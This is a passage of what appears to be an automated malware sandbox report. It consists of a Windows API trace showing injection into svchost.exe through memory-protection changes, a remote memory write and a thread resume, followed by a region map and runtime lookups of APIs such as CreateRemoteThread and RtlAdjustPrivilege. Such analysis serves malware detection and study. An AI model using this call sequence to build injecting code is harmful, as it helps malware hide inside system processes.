[475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0207.262] RtlNtStatusToDosError (Status=0x0) returned 0x0 [0207.262] CloseHandle (hObject=0x1e4) returned 1 [0207.262] NtProtectVirtualMemory (in: ProcessHandle=0x1dc, BaseAddress=0x1eaf5f0*=0x7ff7ce3a3440, NumberOfBytesToProtect=0x1eaf5f8, NewAccessProtection=0x40, OldAccessProtection=0x1eaf5e8 | out: BaseAddress=0x1eaf5f0*=0x7ff7ce3a3000, NumberOfBytesToProtect=0x1eaf5f8, OldAccessProtection=0x1eaf5e8*=0x20) returned 0x0 [0207.262] NtWriteVirtualMemory (in: ProcessHandle=0x1dc, BaseAddress=0x7ff7ce3a3440, Buffer=0x1eaf658*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x1eaf5e0 | out: Buffer=0x1eaf658*, NumberOfBytesWritten=0x1eaf5e0*=0x4) returned 0x0 [0207.263] NtProtectVirtualMemory (in: ProcessHandle=0x1dc, BaseAddress=0x1eaf5f0*=0x7ff7ce3a3000, NumberOfBytesToProtect=0x1eaf5f8, NewAccessProtection=0x20, OldAccessProtection=0x1eaf5e8 | out: BaseAddress=0x1eaf5f0*=0x7ff7ce3a3000, NumberOfBytesToProtect=0x1eaf5f8, OldAccessProtection=0x1eaf5e8*=0x40) returned 0x0 [0207.263] ResumeThread (hThread=0x1d8) returned 0x1 [0207.317] CloseHandle (hObject=0x1d8) returned 1 [0207.317] CloseHandle (hObject=0x1dc) returned 1 [0207.317] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="RuntimeBroker.exe", AllocateDestinationString=1) returned 0x0 [0207.317] RtlFreeAnsiString (AnsiString="R") [0207.317] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="ShellExperienceHost.exe", AllocateDestinationString=1) returned 0x0 [0207.317] RtlFreeAnsiString (AnsiString="S") [0207.317] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="SearchUI.exe", AllocateDestinationString=1) returned 0x0 [0207.317] RtlFreeAnsiString (AnsiString="S") [0207.317] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="backgroundTaskHost.exe", AllocateDestinationString=1) returned 0x0 [0207.317] RtlFreeAnsiString (AnsiString="B") [0207.317] RtlUpcaseUnicodeString (DestinationString=0x1eafec8, SourceString="autoclb.exe", AllocateDestinationString=1) returned 0x0 [0207.317] RtlFreeAnsiString (AnsiString="A") [0207.317] RtlNtStatusToDosError (Status=0x0) returned 0x0 [0207.317] CreateWaitableTimerA (lpTimerAttributes=0x1eaff1c, bManualReset=1, lpTimerName="Local\\{0D65F8EA-0843-C78A-7A91-BCEB4E55B04F}") returned 0x1dc [0207.317] SetWaitableTimer (hTimer=0x1dc, lpDueTime=0x1eaff10, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0207.317] CloseHandle (hObject=0x1dc) returned 1 [0207.317] LocalFree (hMem=0x5982a8) returned 0x0 [0207.317] HeapDestroy (hHeap=0x1fd0000) returned 1 [0207.328] ExitProcess (uExitCode=0x0) Process: id = "11" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x2aecf000" os_pid = "0x198" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x51c" cmd_line = "C:\\Windows\\system32\\svchost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00018e8d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1009 start_va = 0x7f67f000 end_va = 0x7f67ffff entry_point = 0x0 region_type = private name = "private_0x000000007f67f000" filename = "" Region: id = 1010 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1011 start_va = 0xb093810000 end_va = 0xb09382ffff entry_point = 0x0 region_type = private name = "private_0x000000b093810000" filename = "" Region: id = 1012 start_va = 0xb093830000 end_va = 0xb093843fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b093830000" filename = "" Region: id = 1013 start_va = 0xb093850000 end_va = 0xb0938cffff entry_point = 0x0 region_type = private name = "private_0x000000b093850000" filename = "" Region: id = 1014 start_va = 0xb0938d0000 end_va = 0xb0938d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b0938d0000" filename = "" Region: id = 1015 start_va = 0xb0938e0000 end_va = 0xb0938e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b0938e0000" filename = "" Region: id = 1016 start_va = 0xb0938f0000 end_va = 0xb0938f1fff entry_point = 0x0 region_type = private name = "private_0x000000b0938f0000" filename = "" Region: id = 1017 start_va = 0x7df5ffe50000 end_va = 0x7ff5ffe4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffe50000" filename = "" Region: id = 1018 start_va = 0x7ff7ce370000 end_va = 0x7ff7ce392fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7ce370000" filename = "" Region: id = 1019 start_va = 0x7ff7ce39d000 end_va = 0x7ff7ce39dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7ce39d000" filename = "" Region: id = 1020 start_va = 0x7ff7ce39e000 end_va = 0x7ff7ce39ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7ce39e000" filename = "" Region: id = 1021 start_va = 0x7ff7ce3a0000 end_va = 0x7ff7ce3acfff entry_point = 0x7ff7ce3a0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1022 start_va = 0x7ff977f30000 end_va = 0x7ff9780f1fff entry_point = 0x7ff977f30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1031 start_va = 0xb093a00000 end_va = 0xb093a06fff entry_point = 0x0 region_type = private name = "private_0x000000b093a00000" filename = "" Region: id = 1032 start_va = 0xb093b00000 end_va = 0xb093bfffff entry_point = 0x0 region_type = private name = "private_0x000000b093b00000" filename = "" Region: id = 1033 start_va = 0x7ff9753d0000 end_va = 0x7ff9755acfff entry_point = 0x7ff9753d0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1034 start_va = 0x7ff977ab0000 end_va = 0x7ff977b5cfff entry_point = 0x7ff977ab0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1035 start_va = 0xb093810000 end_va = 0xb09381ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b093810000" filename = "" Region: id = 1036 start_va = 0xb093900000 end_va = 0xb0939bdfff entry_point = 0xb093900000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1037 start_va = 0xb093a10000 end_va = 0xb093a8ffff entry_point = 0x0 region_type = private name = "private_0x000000b093a10000" filename = "" Region: id = 1038 start_va = 0x7ff7ce270000 end_va = 0x7ff7ce36ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7ce270000" filename = "" Region: id = 1039 start_va = 0x7ff7ce39b000 end_va = 0x7ff7ce39cfff entry_point = 0x0 region_type = private name = "private_0x00007ff7ce39b000" filename = "" Region: id = 1040 start_va = 0x7ff9776c0000 end_va = 0x7ff97771afff entry_point = 0x7ff9776c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1041 start_va = 0x7ff977df0000 end_va = 0x7ff977f15fff entry_point = 0x7ff977df0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1043 start_va = 0x810000 end_va = 0x942fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 1050 start_va = 0x950000 end_va = 0x950fff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 1051 start_va = 0x7ff972350000 end_va = 0x7ff97236ffff entry_point = 0x7ff972350000 region_type = mapped_file name = "avifil32.dll" filename = "\\Windows\\System32\\avifil32.dll" (normalized: "c:\\windows\\system32\\avifil32.dll") Region: id = 1052 start_va = 0x7ff9773c0000 end_va = 0x7ff97745cfff entry_point = 0x7ff9773c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1053 start_va = 0x7ff977830000 end_va = 0x7ff977aabfff entry_point = 0x7ff977830000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1054 start_va = 0x7ff976f80000 end_va = 0x7ff977025fff entry_point = 0x7ff976f80000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1055 start_va = 0x7ff9774c0000 end_va = 0x7ff977644fff entry_point = 0x7ff9774c0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1056 start_va = 0x7ff9757b0000 end_va = 0x7ff9758fdfff entry_point = 0x7ff9757b0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1057 start_va = 0x7ff977b60000 end_va = 0x7ff977ca0fff entry_point = 0x7ff977b60000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1058 start_va = 0x7ff96f280000 end_va = 0x7ff96f2a8fff entry_point = 0x7ff96f280000 region_type = mapped_file name = "msvfw32.dll" filename = "\\Windows\\System32\\msvfw32.dll" (normalized: "c:\\windows\\system32\\msvfw32.dll") Region: id = 1059 start_va = 0x7ff975900000 end_va = 0x7ff976e24fff entry_point = 0x7ff975900000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1060 start_va = 0x7ff974c30000 end_va = 0x7ff975257fff entry_point = 0x7ff974c30000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1061 start_va = 0x7ff977360000 end_va = 0x7ff9773b0fff entry_point = 0x7ff977360000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1062 start_va = 0x7ff9749a0000 end_va = 0x7ff9749aefff entry_point = 0x7ff9749a0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1063 start_va = 0x7ff975310000 end_va = 0x7ff9753c2fff entry_point = 0x7ff975310000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1064 start_va = 0x7ff9749b0000 end_va = 0x7ff9749f9fff entry_point = 0x7ff9749b0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1065 start_va = 0x7ff974980000 end_va = 0x7ff974992fff entry_point = 0x7ff974980000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1066 start_va = 0x7ff968780000 end_va = 0x7ff9687abfff entry_point = 0x7ff968780000 region_type = mapped_file name = "winmmbase.dll" filename = "\\Windows\\System32\\winmmbase.dll" (normalized: "c:\\windows\\system32\\winmmbase.dll") Region: id = 1067 start_va = 0x7ff9687b0000 end_va = 0x7ff9687d2fff entry_point = 0x7ff9687b0000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 1068 start_va = 0x7ff96c9b0000 end_va = 0x7ff96ca59fff entry_point = 0x7ff96c9b0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll") Region: id = 1069 start_va = 0x7ff972240000 end_va = 0x7ff97225bfff entry_point = 0x7ff972240000 region_type = mapped_file name = "msacm32.dll" filename = "\\Windows\\System32\\msacm32.dll" (normalized: "c:\\windows\\system32\\msacm32.dll") Region: id = 1070 start_va = 0x7ff973450000 end_va = 0x7ff973476fff entry_point = 0x7ff973450000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1071 start_va = 0x7ff9755b0000 end_va = 0x7ff9755f3fff entry_point = 0x7ff9755b0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1072 start_va = 0xb093c00000 end_va = 0xb093cacfff entry_point = 0x0 region_type = private name = "private_0x000000b093c00000" filename = "" Region: id = 1073 start_va = 0xb093cb0000 end_va = 0xb093eaffff entry_point = 0x0 region_type = private name = "private_0x000000b093cb0000" filename = "" Region: id = 1074 start_va = 0xb093d00000 end_va = 0xb093dfffff entry_point = 0x0 region_type = private name = "private_0x000000b093d00000" filename = "" Region: id = 1075 start_va = 0xb093e00000 end_va = 0xb093f87fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b093e00000" filename = "" Region: id = 1076 start_va = 0xb0939c0000 end_va = 0xb0939f3fff entry_point = 0xb0939c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1077 start_va = 0x7ff977720000 end_va = 0x7ff977755fff entry_point = 0x7ff977720000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1078 start_va = 0x7ff977200000 end_va = 0x7ff97735bfff entry_point = 0x7ff977200000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1079 start_va = 0xb093f90000 end_va = 0xb094110fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b093f90000" filename = "" Region: id = 1080 start_va = 0xb094120000 end_va = 0xb09551ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b094120000" filename = "" Region: id = 1081 start_va = 0xb093820000 end_va = 0xb093820fff entry_point = 0xb093820000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1082 start_va = 0xb0939c0000 end_va = 0xb0939c0fff entry_point = 0x0 region_type = private name = "private_0x000000b0939c0000" filename = "" Region: id = 1083 start_va = 0xb0939d0000 end_va = 0xb0939d0fff entry_point = 0x0 region_type = private name = "private_0x000000b0939d0000" filename = "" Region: id = 1084 start_va = 0xb095520000 end_va = 0xb0956ccfff entry_point = 0x0 region_type = private name = "private_0x000000b095520000" filename = "" Region: id = 1085 start_va = 0xb0956d0000 end_va = 0xb0958cffff entry_point = 0x0 region_type = private name = "private_0x000000b0956d0000" filename = "" Region: id = 1086 start_va = 0xb095700000 end_va = 0xb0957fffff entry_point = 0x0 region_type = private name = "private_0x000000b095700000" filename = "" Region: id = 1087 start_va = 0xb0939e0000 end_va = 0xb0939e1fff entry_point = 0xb0939e0000 region_type = mapped_file name = "msvfw32.dll.mui" filename = "\\Windows\\System32\\en-US\\msvfw32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\msvfw32.dll.mui") Region: id = 1088 start_va = 0xb095520000 end_va = 0xb0955dcfff entry_point = 0xb095520000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1089 start_va = 0xb0956c0000 end_va = 0xb0956ccfff entry_point = 0x0 region_type = private name = "private_0x000000b0956c0000" filename = "" Region: id = 1090 start_va = 0xb095800000 end_va = 0xb0959acfff entry_point = 0x0 region_type = private name = "private_0x000000b095800000" filename = "" Region: id = 1091 start_va = 0xb0959b0000 end_va = 0xb095baffff entry_point = 0x0 region_type = private name = "private_0x000000b0959b0000" filename = "" Region: id = 1092 start_va = 0xb095a00000 end_va = 0xb095afffff entry_point = 0x0 region_type = private name = "private_0x000000b095a00000" filename = "" Region: id = 1093 start_va = 0xb095b00000 end_va = 0xb095cfffff entry_point = 0x0 region_type = private name = "private_0x000000b095b00000" filename = "" Region: id = 1094 start_va = 0xb095b00000 end_va = 0xb095bfffff entry_point = 0x0 region_type = private name = "private_0x000000b095b00000" filename = "" Region: id = 1095 start_va = 0xb095c00000 end_va = 0xb095dfffff entry_point = 0x0 region_type = private name = "private_0x000000b095c00000" filename = "" Region: id = 1096 start_va = 0xb095c00000 end_va = 0xb095cfffff entry_point = 0x0 region_type = private name = "private_0x000000b095c00000" filename = "" Region: id = 1097 start_va = 0xb095d00000 end_va = 0xb095efffff entry_point = 0x0 region_type = private name = "private_0x000000b095d00000" filename = "" Region: id = 1098 start_va = 0xb095d00000 end_va = 0xb095dfffff entry_point = 0x0 region_type = private name = "private_0x000000b095d00000" filename = "" Region: id = 1099 start_va = 0x7ff974520000 end_va = 0x7ff97454bfff entry_point = 0x7ff974520000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1100 start_va = 0xb095e00000 end_va = 0xb096136fff entry_point = 0xb095e00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1101 start_va = 0x7ff977820000 end_va = 0x7ff977827fff entry_point = 0x7ff977820000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 1559 start_va = 0xb095520000 end_va = 0xb095652fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b095520000" filename = "" Thread: id = 31 os_tid = 0x1c4 [0207.263] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ntdll.dll", BaseAddress=0xb0938cfc08 | out: BaseAddress=0xb0938cfc08*=0x7ff977f30000) returned 0x0 [0207.264] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="NtCreateSection", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fc39e0) returned 0x0 [0207.264] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="NtUnmapViewOfSection", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fc37e0) returned 0x0 [0207.264] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="NtMapViewOfSection", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fc37c0) returned 0x0 [0207.264] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="ZwOpenProcessToken", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fc4680) returned 0x0 [0207.264] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="ZwClose", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fc3630) returned 0x0 [0207.264] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="ZwQueryInformationToken", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fc3750) returned 0x0 [0207.264] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="ZwOpenProcess", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fc37a0) returned 0x0 [0207.264] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="NtQuerySystemInformation", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fc38a0) returned 0x0 [0207.264] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="RtlNtStatusToDosError", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977f3f0c0) returned 0x0 [0207.264] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="ZwQueryInformationProcess", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fc36d0) returned 0x0 [0207.264] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="RtlImageDirectoryEntryToData", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977f46850) returned 0x0 [0207.264] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="_wcsupr", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fb58a0) returned 0x0 [0207.264] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="_strupr", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fb4f60) returned 0x0 [0207.264] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="memmove", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fc7e80) returned 0x0 [0207.264] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="bsearch", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fb6420) returned 0x0 [0207.264] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="_vsnwprintf", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fb5260) returned 0x0 [0207.264] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="_strlwr", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fb4e60) returned 0x0 [0207.265] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="atoi", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fb43d0) returned 0x0 [0207.265] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="strstr", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fb8bd0) returned 0x0 [0207.265] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="wcscpy", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fb9650) returned 0x0 [0207.265] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="ZwQueryKey", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fc36a0) returned 0x0 [0207.265] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="RtlUpcaseUnicodeString", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977f83170) returned 0x0 [0207.265] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="RtlFreeUnicodeString", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977f57110) returned 0x0 [0207.265] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="sprintf", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fb7fb0) returned 0x0 [0207.265] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="_snprintf", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fb4970) returned 0x0 [0207.265] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="memset", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fc81c0) returned 0x0 [0207.265] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="memcpy", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fc7e80) returned 0x0 [0207.265] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="strcpy", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fb82f0) returned 0x0 [0207.265] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="RtlAdjustPrivilege", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fa32a0) returned 0x0 [0207.265] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="mbstowcs", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fb75a0) returned 0x0 [0207.265] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="RtlImageNtHeader", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977f46820) returned 0x0 [0207.265] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="memcmp", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fb76a0) returned 0x0 [0207.265] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="__C_specific_handler", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fb3f20) returned 0x0 [0207.265] LdrGetProcedureAddress (in: BaseAddress=0x7ff977f30000, Name="__chkstk", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977fc6290) returned 0x0 [0207.265] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="KERNEL32.dll", BaseAddress=0xb0938cfc08 | out: BaseAddress=0xb0938cfc08*=0x7ff977ab0000) returned 0x0 [0207.265] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetLocalTime", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ace9e0) returned 0x0 [0207.265] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="OpenProcess", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977aca8f0) returned 0x0 [0207.265] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="VirtualQueryEx", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: ProcedureAddress=0xb0938cfbf0*=0x7ff977ad24a0) returned 0x0 [0207.265] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CreateRemoteThread", Ordinal=0x0, ProcedureAddress=0xb0938cfbf0 | out: 